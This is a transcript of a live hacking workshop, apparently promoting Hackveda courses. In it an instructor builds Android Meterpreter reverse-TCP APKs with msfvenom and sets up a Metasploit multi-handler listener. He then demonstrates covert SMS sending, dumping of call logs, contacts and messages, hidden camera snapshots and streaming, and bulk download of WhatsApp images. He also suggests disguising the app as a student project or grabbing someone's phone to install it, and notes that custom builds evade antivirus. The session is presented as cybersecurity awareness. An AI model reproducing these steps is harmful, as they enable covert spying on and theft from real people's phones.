Okay. Let me just get this -payload. Payloads first -, list options for arguments to specify. Okay. Okay. So here what we can do, we can use MSF Venom -p -list payloads. or we can directly execute MSF Venom - list payloads. I think the handle has changed a little for listing the payloads, but you can access the list of payloads by calling this command, and the command is MSF Venom -- list payloads. So you can call this command MSF Venom -- list, and you can get a list of all the payloads which are available here. Okay. As you can see, there are 596 total payloads, which means you can hack devices in 596 different ways. Okay. Which means you can create viruses for AIX machines, HP AIX. You can create viruses for Android. Okay. There are various ways to hack Android devices. Then you can create viruses for iOS devices also. iOS mobile phones can also be hacked. Then you have BSD hacking payloads. Then you have command prompt hacking payloads for Windows. Then specifically for Unix, these are hacking command prompt for the Unix payloads. Okay. So there are a lot of payloads. Then you have Java payloads. You can hack any of the Java applications. Okay. Then there are specific payloads for Linux operating systems. So there are n number of payloads which you can, hack. Then you have payloads to hack Node.js applications. You have payloads to hack Mac OS X. Okay. So you name the OS, and there are payloads available for hacking. So you can have PHP payloads. So suppose you are accessing a website in PHP. So that PHP website can also give you a virus with which your application or your device or your computer can be hacked. Okay. So whether you are building in Java, whether you are building in PHP, whether you are building in Node.js, all those applications can hack you. Okay. So that's where it's very, very important. You can get hacked using Python programming language also. There are payloads for Python as well. Okay. So it's not limited only to OS. You can hack mobile applications. You can hack mobile devices with Python, PHP, and various other, you can hack computers with web-based programming payloads, and a lot of other options are available. So currently we are getting this demonstration for Android, and the current payload which we are going to use, we are going to use Android Metapreter reverse TCP. Okay. This is what we are going to use. And what it is going to do, it is going to run a Metapreter server in Android, and it will connect back to the stager, which means our hacking box is going to be the stager. And when this payload is going to be executed on the mobile phone is going to run the server in Android, and it is going to share all that details back to our hacking box. Okay. So that's what we are going to get. So guys, let's quickly start with setting up the payload. So are you all ready? Just give me a quick confirmation to create your first virus here. And we're going to create the first virus with MSF Venom. So guys, we're going to create the payload MSF Venom -p. And for what we're going to create, we're going to create a payload for Android with the name Metapreter, and the payload name will be reverse TCP. Okay. And post that, what do we need to do? We need to set up the listening host. The listening host IP address should be our server IP address, because the payload is going to be executed in the mobile phone, and it is going to make a connection back to our server. Okay, is that clear? So we are going to use lhost is this. Format should be raw, and output should be, let's say, its project.apk. So I'm going to give you a very wild idea. Suppose आप लोग अपने faculties को कभी projects दिखाते हैं, मतलब don't do it. That's just giving you for fun. So you can make an application in a project kind of format, and you can ask your friends, ki, bro, just test my app. I have made an application for you. Okay, result.apk or love.apk or XYZ. And as soon as they run the application on the phone gets compromised. Okay, and then you can access all that information. So it's that easy. Now, so you can quickly name the application as per your own choice, and let's click on itsproject.apk. Okay. So once I run this, so it's a one single command. You don't need to know programming, and you're going to get an APK created. Okay. So now you can see that a payload size of 10185 bytes and a application known as itsproject.apk, an Android application has been created. But mind it, if you know programming language, this virus will 100% be detectable on devices. Okay. But you can write your own custom viruses in Android programming using the same concepts, and those applications are not detected, because once you create a new application, its signature doesn't match with the virus checkers, and your application can run smoothly on any other device. Okay. So that's where you can learn Android programming or various other programming languages in order to build real viruses. And if you want to understand where you can learn, definitely you can come to Hackveda and you can learn. Okay. Now coming to the next point. So your itsproject.apk virus is ready at the moment. And if I refresh the mobile phone, you can see that we have got an APK here. itsproject.apk is ready. Okay. Now, before we run this application on the mobile phone, it is mandatory that there is a listener listening for the reverse shell. Okay. So in that case, we do need to run the server on the hacking box. Okay. So how can we run the server now? So I'm going to clear this. I think this is automatically recorded in a video, so you don't need to worry. I'm going to share this command and everything with you. And also, let me just share the YouTube video with you, which is currently being recorded on our channel. Okay, let me just give that to you, youtube.com. And here is cybersecurity workshop, which is currently happening. Let me just quickly go here. Thank you. And let me also like it. Okay, so I'm just sharing the video with you all so that you can quickly test that at your end as well. Okay, here's the video link where this training is being recorded. Now coming to the point. Okay, so now what we are going to do, we are going to get to the next step, and the next step is we have to create a listener on hacking machine using Metasploit multi-handler. We are done till step number 6 here, where we have set up a hacking machine, we have created a web server for hosting virus and hacking files, and we have created a mobile virus using Metasploit MSF Venom. Now we are going to create a listener on hacking machine using Metasploit multi-handler. Okay, and how do we do that? Let me show you. So now we are going to start a listener before we execute the application on the victim device. So we are going to call Metasploit. Okay, Metasploit. What is Metasploit? Metasploit is an application which includes a lot of payloads, a lot of exploits with which we can hack remote machines. Okay, and it has one exploit or one listener, which is known as multi-handler, which is capable of receiving multiple connections from the victim devices, and you can operate multiple victim devices in one time. Okay, which means, let's say if you have given virus to 5 people and all those 5 people are hacked, so you can control all their 5 devices using Metasploit multi-handler. Okay, so let's go to the command. So I'm going to execute Metasploit. Sorry, it is MSF console. The command is MSF console. So I'm currently starting Metasploit framework in a console format, which means I'm going to get the command prompt access of Metasploit console, and I'm going to create my listener. So Metasploit, the current version is V6. It has 2,196 exploits, which means there are known 2,196 vulnerabilities of different operating systems and applications using which that can be hacked and compromised. Okay, there are some automated scripts, we call them as auxiliary, auxiliary scripts are the scripts which can automate certain tasks for you. Okay, automation means, let's say once a device gets hacked, get to his WhatsApp directory, download all the photographs into a local machine. So all that can be done. Okay, now, so let's go for it. So I'm going to clear this and I'm going to show you how we are going to create a listener now. So in order to create a listener, I'm going to use a command, use exploit/multi/handler. Okay, so this is a handler which I'm going to create. Okay, and this handler is going to receive connections from the victim devices. If you all want to, download this application, you also can download the application from the same IP address, and we can hack your phones also in this case. Okay, so you are allowed to get hacked. Now, so what we can do, we are going here, use exploit multi-handler, and once I'm going to click on it, you can see that now the configuration is done, and we are using the reverse shell TCP handler. Okay, so the next option is, you can see that the multi-handler is selected, and we can show options. Okay, okay, there is one thing which we missed. Okay, and what is that? I'm going to tell you that. Just allow me a minute. Options. So in the options, what you can see here, there is a L host which we have to define, where we are going to the listening address, where we are going to listen for the incoming connections. Also, we do need to have a port number on which the connection needs to be made. Okay, and somehow while I created that virus, I forgot to add the L port. So L port is also a term which means the port on which we are going to make the connection, and that is also very, very important. Okay, so allow me a minute before I start this multi-handler. What I really want to do is, I want to execute the MSF Venom command once again. I want to remove this previous ITS project.apk. Okay, so I have currently removed the previous ITS project, and I'm creating a new one. We need to add one more command which was required, MSF Venom. I'm again creating the payload, MSF Venom. Select the payload. The payload should be Android meta/reverse_TCP. L host is equal to, the IP address is 13.234. Okay, and the next facility should be L port, and the port number which I'm going to use is, let's say, 4444. On this port number, we are going to receive a connection, and then I'm going to define the format as raw and the output as ITS project.apk. Okay, and now I'm going to create the payload once again. Okay, so the payload has been created again, and now on the right hand side you can see that a new app has been created. So the information which I have added is the port number also. This port number is also required in order to receive the connection. Okay, now I'm going to start the listener. So I'm going to show the options, and the current options are, we have to define the L host on which we are going to receive the connection. So here it is very important. So when you are specifying this information on the hacking box, you cannot specify the IP address of hacking box itself, because any machine cannot listen on its public IP address. Instead, if you want the hacking box to take connections from everywhere, you have to specify the port, you have to specify the IP address 0.0.0.0. Then it will listen for all the connections. Okay, whatever connections are coming back to the hacking box, it will accept those connections. So what are we going to do? We are going to execute a few commands here, which is set lhost 0.0.0.0. So this is going to be the lhost on the hacking box for the multi-handler. The multi-handler who's going to listen for the connection will be listening on 0.0.0.0. Okay. And when we created the payload, then there we specified the IP address of this hacking box, because when Android is going to make a connection, it needs the public IP address. Okay, so Android will connect on 13.252. whatever the IP address is, and the multi-handler will be listening on 0.0.0.0 to accept connections from any of the hacked devices. Okay, and the connection will happen. So we have set up the L host. We are also going to set the L port. The L port will be, let's say, 4444. You can use any ports between 1 to 65,535. Okay, but you have to be very sure whatever port number you have specified in that payload, you have to listen on that same port here. Okay, otherwise the connection will not be made. Okay, otherwise the victim will not get hacked. You won't get the connection from the victim. Okay, so we are done with specifying this information. And if I show you the options once again, so you can see that the L host has been configured, the L port has been configured, and now we are ready to exploit. So now once I run exploit, this means my hacking server is now running and it is waiting for the victim to get hacked. Okay, now suppose, so we got a link and we have given a link to anybody we want to hack. Okay, एक और एग्जाम्पल सिनेरियो बताता हूँ. मान लो आपने ऐसा सर्वर बना रखा है रेडियो और आप नहीं ट्रैवल कर रहे हो, ठीक है, एंड समहाउ आपको लगा कि यार आई वांट टू हैक दिस पर्टिकुलर गाय. ओके, सो व्हाट यू कैन डू, यू कैन लेट्स से ट्रिक हिम, भाई 1 मिनट के लिए फोन देना यार, एक अर्जेंट कॉल करना है ना. So once he has given that phone to you to make that call done, you know the IP address, or you can use any URL shortener, you know, and you can quickly download this app, and it will hardly take few seconds to get this app downloaded. Okay, and execute, and the mobile phone is compromised and the shell will be connected to the server. And I'm showing you the demonstration. Suppose I'm that guy. I'm the guy who has this mobile phone and somebody has taken this phone and quickly downloaded the app. Okay, so let's say I'm going to quickly click on OK, and the app has been downloaded. So it's that quick. Okay, and now I'm going to open this application. So I'm going to click on install this application. Once this application gets installed, okay, I'm going to install this application. And once the application is installed and running, I'm going to open this application. And once the app is opened, on the left-hand side, you can see that you're going to get a connection. Okay, there was a connection, but somehow it got stopped. Allow me a minute. Okay, I think I have multiple apps installed with the same port. Okay, just allow me a minute. I'll quickly get to the apps. So that's where, once you know Android programming, you can do a lot of, you know, setting configurations and all that stuff. So that becomes easy. In order to get the app automatically installed on a device, you can do a lot of modifications. And allow me. Okay, I've got the permissions, with the notifications. Let's stop it once. And let me just run it once again. So there could be two things. Either we can work out with different formats also. Okay, in case if that APK format has an issue, we can quickly change that format and work out in a different format as well. Let me just quickly get that. /multi/handler, and I'm going to set L host as 0.0.0.0, set L port as 4444 and exploit. Either what I can do is I can sometimes change the port, because sometimes what happens, the port also creates troubles sometimes. So let me just create once again MSF Venom. Allow me a minute. Let me uninstall the previous one and let me just change the port number. MSF Venom, Android, Meterpreter, reverse TCP, never host, L port. I'm making the connection on 4445 at the moment. -F raw -o its1.apk. Okay, and I'm going to exploit it. Let me just quickly check the options. Okay, I'm here. We're currently listening on 0005. Click on OK. Okay, I think there's a binder issue maybe. So allow me 1 minute so that I can, quickly check back with it. Just give me a moment. I think I'll quickly check back. I don't have the proper network connection. Okay, just one thing, what we'll do, we'll try with Meterpreter _ reverse _ TCP payload. So I think there's a change in the payload. So I'm using the another one, Android Meterpreter _ reverse _ TCP, and I'm making it with another one, 446, or I'll make it on 6666, let's say, and I'll make it as ITS2. I think there is a change in the payload. So there's a activity issue. Okay, I've got another one created, ITS APK2. And let me just get to the Chrome, refresh it, and I'm going to set lhost as 0.0.0.0, set lport as 6666, exploit it. I'm going to run this shell to get that to with the its2.apk. I'll uninstall the previous one and let me install this. Okay, so I have opened this. Just trying to make the connection, command shell 2. Yeah, now you can see that it is actually trying to make the connections here. We are getting the connections from 157.37.137.117. But somehow, maybe I think due to my network, the sessions are getting closed. Just give me a minute. I'll just check. Allow me a minute. So allow me 1 minute. So I'll just rerun for a moment. Okay, I think there is certain issue with this particular payload which has been created. Let me just check. What we'll do, we'll quickly check any updated payload which has been available in the list. There might be an issue with the payload which we are using. So let me just quickly check that, because the connections are being made, but somehow the stager is not able to get the shell back. So I'll just quickly check back the Android payloads once again. Because it might be a stager payload, and what do we need is we need the metapreter payload to be returned. Okay, so what we'll do, we'll quickly check here. So there is an Android shell reverse TCP. There is an Android meta connect back to the attacker and spawn a metapreter shell. Okay, Okay, that needs to be done. Okay, we need the metapreter reverse TCP and the payload also, which we are using, that also we need to set on the, here. So now I got it. What was the issue? I'll quickly walk you through with what the issue was, and we are going to quickly sort this out now. Okay, let's see. So the issue was we were using the payload of one category and we are using the listener of other category. So we have to modify that. Okay, and how can we quickly do that? So I'm going to quickly show you once again. So I'm using this MSF Venom. I'm making a payload of Android metapreter / reverse _ TCP. Sorry, we're using this metapreter _ reverse TCP. This is the new shell, which new payload which we are using. We're going to set up the L host. L host is going to be this. We're going to set up the L port, and let's say this is going to be 4446. We are going to use this payload, let's say 4447. Okay, and we are going to use the format as raw, and we are going to use the output as its virus.apk. Okay, so now you can see that the payload which we are currently using is Android metapreter reverse TCP, and it is going to return us the metapreter shell, that is for sure. But now when we will be reading the listener, at the listener side also we need to specify the same payload, Android / metapreter _ reverse TCP. That needs to be defined. So I'm going back to the same category once again. And now what am I doing is I'm going to set the payload first. Okay, set payload, and the payload is going to be Android metapreter _ reverse _ TCP. So the kind of payload which we have created to be run on the mobile device, the similar kind of payload you need to keep on the listener side. Okay, so now we are defining set payload Android metapreter reverse TCP. So this is going to be able to send the stage back to the mobile phone. Now we are going to set the L host. L host is going to be 0.0.0.0, and we are going to set the L port. Okay, and this is going to be 4447. And finally, we are going to exploit. Okay, so now we are listening, and we have created the new application with the name its virus.apk. So I'm going to click on that APK now, and we are going to get started with the demonstration. So once the app is downloaded, and once we click on open, okay, we're going to install the application. And once the application gets installed, we are going, as soon as we are going to open this application, you can see that the connection will be made and we got the metapreter shell now. Can you see that? And this shows a successful connection. Okay, which means now there is a metapreter session 37 which has been opened on our hacking box, and this is the connection of a hacked mobile phone. Okay, so guys, any of you who's interested can quickly test with its virus.apk. Okay, this, as soon as you run this application, you will also be connected with the device, okay, with the hacking box. Now I'm going to show you what we can do here. So once the mobile phone has been compromised, you can see the mobile phone, you can use it in an appropriate fashion. Okay, you can use the mobile phone, and you won't have any other, notifications, anything like that. But on the other hand, on the hacking box, the phone is compromised. Okay, now how we are going to use it? So first, we quickly click the command help. Okay, in the help, we get a lot of commands which we can execute on that mobile phone. And what are we going to do? We are going to test all that. So first of all, there are certain core commands we can execute. There are some standard file system commands which we can execute to get the files from the mobile phone and do a lot of stuff. Followed by, we can execute webcam commands that we can do. We can perform activity start, get the SMS, send the SMS, and all that facility. We can do that. And now we are going to quickly do one demonstration. So what all we can do, let's get started with first demonstration. In this demonstration, what am I going to do? We are going to have a send SMS from this target device. So if you can see currently at the right hand side, my device, my phone is at a standstill position. Okay, I'm not using my phone. And what am I going to do? I'm going to send a message to one of the students. So guys, what you have to do, just send your mobile number again in the chat once again. Just send one mobile number. And what are we going to do? We are going to send an SMS through the hacking box, which is an AWS instance machine, to that mobile number. Just send one mobile number. I've got a mobile number from Aditya Jha. So Aditya, what you need to do, just turn your cam on once and keep your mobile phone in your hand. Okay. And let's say, what are we going to do now? So Aditya, please, if you can turn your cam on and keep your mobile phone handy with you. Aditya, are you there? Aditya Jha, are you there? Or anybody who can turn his cam on and share his mobile number. Let's have this demonstration live. Okay, I've got again with the Shivansh Seth. Shivansh, can you turn your cam on? Yeah, please turn your cam on and let's just get this demonstration going. Great. So Shivansh, you need to have your mobile phone, and once you receive the message, then you are going to show it to us. Okay. So let's see. So currently the hacker's device. So currently there is a victim device. You can keep it with you at the moment. Once you receive the SMS, then show us. Okay. So guys, we are doing it. So now you can see that the mobile phone has been compromised with a hacking box, which is an instance which is just created. Now, what am I going to do? I'm going to use send_SMS facility. And first I want to show you the help. Okay. So what can we do with the send SMS facility? We can send an SMS to a destination number along with a text. Okay. The SMS text which we want to send. So I'm going to send an SMS here, send_SMS. So suppose a hacker who has access to the hacking box is sending a message to this mobile number. We are going to send this to Shivansh mobile. Okay. And we are going to define the text. Hello, Shivansh. Okay. We're going to make a little fun here. Please don't get offended. And let's just let me take a name of a student. So I have, let's say, Yuvraj Kumar Singh. Okay. Hello, Shivansh. This is Yuvraj. Okay. So I'm going to send the message. So a transmission has been successful. And Shivansh, if you have got the message, please unmute your mic and tell us if you have got the message. You have got it?
Yes, sir.
That's great. So what has been done? I have not used the device, but now if I get back to the SMS of my phone, let me just quickly go to the messages, and I can show you that the first message, which states here, is this message, and it shows, hello Shivansh, this is Yuvraj. So that was the message which has been sent through this mobile phone, but I was not using the mobile phone. Okay, the mobile phone was controlled by a server which is somewhere in a different region on cloud. Okay, now what next we can do? We can do a lot of stuff. Okay, coming back to the point, let's say I am again going to go to the background and I'm going to quickly show the sessions list. So I have one shell connected. Okay. So I'm going to interact with this sessions interact. With this command, you can interact with multiple mobile phones at the same time. I think this has been closed at the moment. So I'm going to exploit it once again. And once we exploit, we are going to get the reverse shell connection. It may be sometimes due to network, the shell gets disconnected, but automatically it gets connected. So one of the best part is, even if the victim lost his internet connection, as soon as he gets his internet connection active, the shell again is going to be received on the device. So you can see that I have not executed it second time on my mobile phone, but automatically we got the shell connected. Okay. Now again, so we'll get to the next command. So I've shown you one command which was send SMS. Okay. Second thing which I want to show you is dumping the call logs. Okay. So how can we quickly get access to all the call logs? Okay. So I'm going to do something like this. I'm going to execute this command dump_call log. And as soon as we press enter, you can see that around 500 entries of the call logs have been extracted here. Okay. So what I'll do, I'll quickly get back to my server. Let me just quickly go to, I think this is 13.232. I'm going to show you. Okay. Get to the instance. And I'll get the IP address. I think IP address is here. So with one single click, what has been done? We got a list of all the contacts. Okay. So once I open this here, we got a call log dump. And if I click on it, you can see that we have got all the call logs extracted from that phone. Okay. And you can see that the last number which I had made is 999076424. That I've made a call to my mom, I've made a call to my dad, at what time it was an outgoing call or an incoming call. So, you know, you can grab each and every information of the calls which have been made, okay, with one single click. Coming back to the next point, okay. Let's get going. Let's get to the second demo on this. So what next we can do? Coming to the third section. So you can quickly dump the contact information of the users. Okay. So we can quickly come here, dump_contacts. And you can see that in the meantime, when things are happening, mobile does not know that anything is happening in the background. Okay. So mobile phone is actively working. It might be a possibility that the user might be traveling somewhere. And if the phone is hacked, each and every information from the backend is being extracted. Okay, dump_contacts. Sometimes in case if the operation timed out, that means there is some low internet connectivity issue because the file may be large, which you are trying to download. So you need to wait for some time and then you can try that operation again. Okay. Now, at the moment, there might be a huge, contacts available on this phone. That's why it is taking time. Let's just quickly get into dump SMS. Now, this is very important. When you dump SMS, what you get a lot of OTPs of the user. You get a lot of their banking transaction information. And through that, a lot of things of a user from his phone can be exploited. What I'll do is, allow me a minute. Let me just quickly exploit it once again, because I think the session terminated. So I'm going to quickly listen for the session once again. Okay, and I'll quickly get to the background. Let me just quickly, I think the connection is there, but I'm just making one more connection. Okay, so I've got another session 39, and I'm just opening a list of sessions -list. So I've got the session 39. Okay, so I'm going to interact with it. Sessions interact 39. And I'll get to the help again. And I'm going to show you the dump_SMS. So once I click on dump SMS, again, there might be, a certain heavy size of SMS. And you can see that we have got 12,701 SMS extracted. Okay. And now what we can do, we can quickly get back to the dump and we can see that So we got the SMS dump from that user also. And now you can see that this is the SMS dump, which we got. And here, now you can see that. So I've got the SMS dump, and the last outgoing message which has been sent was, hello Shivansh, this is Yuvraj, and all other messages. Now the messages like, missed call from this number, and you have recently recharged your Geo number. And there could be, a lot of things like you have recently recharged a Geo with 299. So people, this can be very helpful in social engineering. So what people can do, they can quickly get to know a lot of information about the user, and that information can quickly be extracted, and a lot of OTPs, how much balance is in your account, so that they can quickly trick you into getting things extracted. And people can forge like, I'm calling from a bank and you have made this transaction, and somehow we need to access some of your information in order to get that transaction passed through. And a lot of things can be done in social exploitation. Okay, so these are happening in reality. Okay, the things, there are various information which can be quickly extracted. Okay, plus there are times when people are exchanging their private messages and conversations. All those can also be extracted. Okay, so now we have seen that we have extracted a couple of information. Now we are extracting another one, very, very dangerous information, which could be the camera and the audio. Okay, so first, what am I going to do? I'm going to use webcam_snap. Okay, and we're going to get a snap from this device. So you can see that we have called webcam snap, and the mobile phone nothing has been done on the mobile phone. Okay, but the snap has been taken. And now if you see, if I get back to my server and if I refresh the server here, you can see that we got a JPG image, and it shows me this is the place where my phone is kept, and I've got a pen stand with which that photograph has been clicked. So the phone was at a standstill position, but the photograph has been clicked. Now, if you want me to take the snap from the front camera, so that too we can do. Sometimes it happens that the phone is kept, in a different way. It might be standing, or it might be on a stand, or it might be at a different way, at a different place. So you can switch the cams. So we can quickly get a webcam list. So what do we have is we have a back camera and we have a front camera. Okay, so the device which is connected, we have two cameras there, a front camera and a back camera. So you can extract information from the appropriate camera, whichever is required. So what can we do? We can quickly get to webcam_snap, and we can have the help, and it will tell us that from which webcam do you want to extract the information. So we can specify -i option, and we can define the index of the webcam which we want to use. Okay, we can define the path, the quality, and automatically view the JPG image in order to open it quickly. Okay, so what we can do, we can quickly take it webcam_snap, and we can take the index number 2, and this time I'm going to get a front picture, okay, from my cam. So a frame has been extracted and a new image has been clicked. Now, if we get back here, and if I show you the second image, so we got this image as the second image, and now you can see that this is me who is sitting somewhere, and the photograph has been snapped. Can you see that? Guys, just give me a quick confirmation. Are you able to see that? Do you find it exciting?
Yes, sir.
Yes, sir.
So are you a little scared now? How many of you take your phones in the bathroom? Never take it.
It's very dangerous, sir.
It's very, very dangerous. You cannot even imagine that what might be happening. You may feel like your phone is kept,
Now they'll all be careful.
Yeah. And so this is what is happening. And don't be surprised with that. You don't need to be hacked, with some other hacker. There are a lot of applications already running on your mobile phones which are which have control to each and everything on your device. Okay, and every information is being collected and extracted, and now you have practically seen it, that how easy it is to extract all your information and keep it on a cloud storage, and then process it through machine learning, and to extract a lot of information about you. Also, suppose you are traveling, okay, and there are things that somebody can somebody can spy on you continuously with the webcam stream. So we can quickly click on webcam stream, and now you can see that an HTML page has been created where the latest feed of the camera will be displayed. Okay, so we can quickly get back to the server. I think it was 13.234. Okay, and there is an HTML page which you can see here. Let me open it on a new page, and now you can see that you can see that. So this is an active stream happening at the moment. So it's taking a little time to load, and since the picture is, of a very high quality, but a lot of snaps are currently being taken. Can you see that?
Yes, sir.
So, so it continuously gets streamed, and the camera continuously, captures wherever you are traveling and whatever is happening. And the best point is, it does not show up. Okay, you will never get to know that something in the background is spying continuously on you, wherever you're going, whatever you're doing, and there is nothing at the front of the camera, neither the camera symbol or anything like that whether anything is running. Is that clear? Is it scary?
Yes, sir. Yes, sir.
It's very scary. Okay, now, so avoid taking your phones. I don't know why somehow automatically there is a silence here in the room, even though people were not saying anything previously, but I can sense a different level of silence. What happened, guys? Are you all okay? Hi, what happened? Anybody will speak anything? So, are you understanding how easy things are? Now, taking it to the next step. Anybody? Any responses? Shivansh, Pragati? Okay, do one thing. I just want to, if you have any questions, that's fine. But for a moment, I want all of you to turn your cams on for a moment. For 1 minute, just turn your cams on. It's already 12:32. We have to wind this up very quickly. Just turn your cams on for a moment. Everyone. So Shivansh is ready, and all others. Guys, come on. Aditya Jha, Harsh Kumar Patel, Yuvraj, Anuj, Mukul, other candidates, all other people, just turn your cams on. So what have you, anything striked in your mind? How dangerous the mobile phone is? And there is a lot of things which we are going to proceed further, which I'm going to show you. And it's the latest OS, the phone is updated. It's not like that the phone is not updated. The phone is updated. Things are going well. Just that we get a prior notification in the current mode of implementation, but we can actually modify this app simply by writing a new code on Android Studio, and without any notification, it can exploit, the other devices. So I believe you got something out of this. Okay. Now, coming to one last point. So here, So what next we can do? You all have seen that Instagram and all those things, you can access to all those information also. And one thing which I would like you to show, so let's quickly get into the shell. Okay. So there's a command known as shell with which we can access Android completely. Okay. So once I click ls here, or I'll quickly execute the pwd command. So you can see that I'm currently in the Android phone at the moment. Okay. And I'm in the data/data directory. Now, what do you need to know? That suppose we want to download any information from WhatsApp. Okay. Or suppose you want to get any WhatsApp image or any information from the gallery, you can actually do that. Okay. So what we can do, I'll quickly get to this cd/data/data. Okay. So once we get to this directory and I do a list, okay, cd/data/data, or what we can do is cd/ls. So you can see that these are all the directories available in the Android mobile device. Okay. These are all the directories where your information is stored, and we can actually extract a lot of information from your SD card. Majorly, since you all know that we take mobile phones of 64 GB, 128 GB, 256 GB, and that means the SD card. So the SD card stores each and every information of your phone, okay? And it's public. So what we can do is we can quickly go to the SD card and we can do a list. Now you can see in that list, all the files which you might be, recording, all your call recorders, all your photographs which you are snapping, okay? Any files which you have downloaded, okay? Movies and information about your WhatsApp, whatever images you are exchanging on WhatsApp, everything, images which you are extracting or sharing through Facebook, all that information is stored in that SD card, okay? Now what I want to do is, let me just quickly get back to WhatsApp. In fact, the Instagram also. So, but I don't have Instagram on this phone. So I'll quickly show you about WhatsApp. So for WhatsApp, what do we have is, we have the WhatsApp databases, we have the WhatsApp backups, and we have the WhatsApp media in this, okay? And mind it, the device is not rooted. This device is not rooted at all. This is a device which is a non-rooted device, okay? Now, so you can access the information. So I'll get to the media, and if I quickly do ls, you can see that we can get access to WhatsApp audios, WhatsApp documents, WhatsApp videos, WhatsApp photos, WhatsApp images, anything you can extract. So I'm going to quickly get into WhatsApp images, okay? And if I do a list, so you can see that all the images which are available in WhatsApp is available over here. And in fact, we can download any of those images on that cloud machine from the phone itself, okay? So if I quickly show you the PWD, so currently in the Android phone, in the SD card, WhatsApp media, WhatsApp images, here we have all the files available, and we can download the files from here, okay? So what am I going to do? I'm going to show you how we do that, okay? So I'm going to extract one file. Let me just copy this address. This is the Android address from where I'm going to, extract an image, and I'm going to extract one image. And I'm so sorry, I don't know what the image is. In case if there is anything obscene, please forgive me for that, okay? I'm not sure what this image could be. Okay, so I'm going to extract this image. Okay, and how do we do that? So we can download all the images from WhatsApp, but currently I'm showing you one step that how we do it. So I'm going to exit the shell and I'll get back to the metapletter. Okay. Now from the metapletter, what am I going to do? I'm going to download it. Okay. So if you go to help, you can see that there is a command known as download. There are certain file system commands which we can make use of. And here are the file system commands, and the file system command is known as download, which means we can download a file or a directory. Okay. So what am I going to do? I'm going to type in download and I'm going to check the help. So what we can do, we can download from the source and we can save it to a destination. Okay. We can download all the files or the folder and we can save the files into the destination. So what am I going to do? So currently, if I go to the background, okay, and if I see I am in the HTML directory, so I'm going to make a directory known as WhatsApp hack, okay, and I'm going to extract all the images in the WhatsApp hacked directory. So I'm going to interact with sessions -- list, and I'm going to interact with session interact 39. And I'm going to download, okay, from where? From here. I'm going to download all the files from the WhatsApp images, okay, and I'm going to make use of double quotes here, okay, and we can, you know, change it to this format so that we get all the files extracted, and I'm going to save it into the directory /var/www/html/WhatsApp_hack, and I'm going to start the download process. Okay, so we do need to use the double quotes here. Let me use the double quotes, or else let's just use the same path format. Whenever we are using, you know, any destination server, sometimes we do need to use the double slash, or you can use the /. So now you can see that the download process has begun, and we are downloading the WhatsApp images directory. Okay. We are mirroring. You can see that all these JPGs from the sent is being stored. The images are being downloaded. So can you see that from the mobile phone? This is something known as backing up from the phone. So what is currently happening? It could be a possibility that all your files can be downloaded in a similar fashion. Okay. And now, since I have terminated it, if I quickly get back here, let me just quickly get back to the files here. I'm going to refresh. You can see that I've got a WhatsApp hack directory, and I've got a directory known as sent here. And within sent, I've got a lot of images, and I'm just going to open it, and I don't know what this image could be. So please, you know, don't get judgmental with respect to whatever image comes up. So here is an image which one of my friend has taken here in the office, or he might have clicked it and I would have sent this photograph to him maybe via WhatsApp. And here is another image which we got, you know, we clicked with some office staff. Okay. So can you see that? So these are some of the earlier pics which has been sent. These are some certification pics which has been extracted. So somehow like this, you can quickly back up information from that mobile phone, and you can quickly, you know, download that. And a lot of things can be done. So I think we are good to go. You have got to see a lot of things which we have currently done through here. And I'm going to exit now, okay, from here. So let me just rm/rf star. And I'm just removing all that data which was on my server so that none of the information gets, you know, exploited. So I've deleted all my data from the server. So now you can see that that's how we can quickly extract information from servers, from mobile devices, or we can hack into any device and we can do a lot of stuff. So guys, I believe it's an eye-opener session for you that really things happens. So we have executed a lot of commands to hack SMS, camera, WhatsApp, etc. And now we are coming on to the final agenda of why we have organized this. So this has been organized so that we can build cybersecurity professionals, those who have this understanding that it is very easy that the data is getting compromised, and the data is very useful today. You already understand that how many of us practically know hacking. Since we are in computer science or in technical background, we understand things, but there are a lot of people like our family members, those who have no idea. They just don't even know what to click and what not to click. Okay. And this audience has a lot of potential information in their phones, and a lot of things is at stake. And not just B2C, when it comes to B2B also, these are the same people, those who are working in organizations and businesses and have a lot of potential information on their phones. So a lot of things is being exploited. And we do need great cybersecurity expertise so that we can, protect the devices, we can protect people, and more altogether, we can protect the family and the organizations and the people associated to us. Now, in order to do that, what kind of things are required in the industry? I'm going to quickly walk you through with one basic stuff that how Hackveda can help you in getting a lot of information from Hackveda's platform. The practical demonstrations which I have shown you here is a complete course series is available on our one-to-one platform, which is free to access. You can quickly get access to one-to-one, extract a lot of information about how you can do hacking and a lot of programming languages and other stuff. But one thing which I want to show you is that what is the industry seeking at the moment when it comes to cybersecurity. So we do have a lot of hiring partners, those who hire for cybersecurity. So you would have seen Agio, I think you would have heard. So Agio is hiring cybersecurity professional, and there are a lot of Fino is hiring for a cybersecurity professional. So what you can do is, I'm just sharing one link with you all. You all can register free on this. In fact, I'm going to give you access to the cybersecurity part, where you get access to top 5 free ethical hacking courses. Okay. Let me just give you that link, and then I'll walk you through with how you can grab this information and how you can make the best out of Hackveda's platform. So guys, I'm sharing this link with you. This is a registration link where you can get access to all the free material. Register here. Okay. It's a free ethical hacking link where you can, get this in concepts of basics of networking, basics of reverse hacking. Then I have shown you this concept of reverse hacking using Amazon Web Services, concept of reverse shell, create a virus. Okay. So these approximately 4 topics, similar topics I have shown you, in which we start our course. And there are a lot of things like how you can hack man in the middle, how you can hack passwords, even if they are SSL protected, how you can build virus programs for different operating systems, how you can hack mobile phones, how you can hack websites, how you can crack softwares, and how you can make trial versions into full versions. All these kinds of practical hacks are available, and you can register and get started for free on cybersecurity on Hackveda. But coming to the point that what is our mission? Our mission is, Hackveda is a workforce development organization, and we are on a mission to build Hackveda certified professionals for cybersecurity. Okay. And for this, we are helping companies to hire great talent from Hackveda's platform. Okay. And there are a lot of candidates, those who are currently taking cybersecurity interview preparations on the platform, and I'm going to share that information with you also. So what are we doing here? So generally, whenever a company hires for a cybersecurity professional, what are they looking? Apart from the experience, there are opportunities available for freshers also. So I can share that information with you guys as well as soon as we progress further. But just to give you a quick information about what skills are required to become a cybersecurity professional. Okay. So suppose there is a company who's hiring for Bangalore and Hyderabad location. What are they asking? They want you to understand identification of the issues, the risk, opportunities, improvement of policies, the security policies, the processes, procedures, and standards of cybersecurity. Okay. Then documentation of the reports of the security assessment risk, or using certain tools in order to create the software security report, followed by identification of information security compensating controls in order to have primary control, then vendor risk assessment with the information security point of view, risk finding and sharing and recording those risk findings with the company, with the stakeholders. Okay. Performance of risk treatment, risk assessment, working with security teams, compliance teams. Okay. Capability in the following areas: you should know risk management, you should know how we implement security and audit policies, how do we perform data protection and privacy, how do we perform cloud security. Okay. 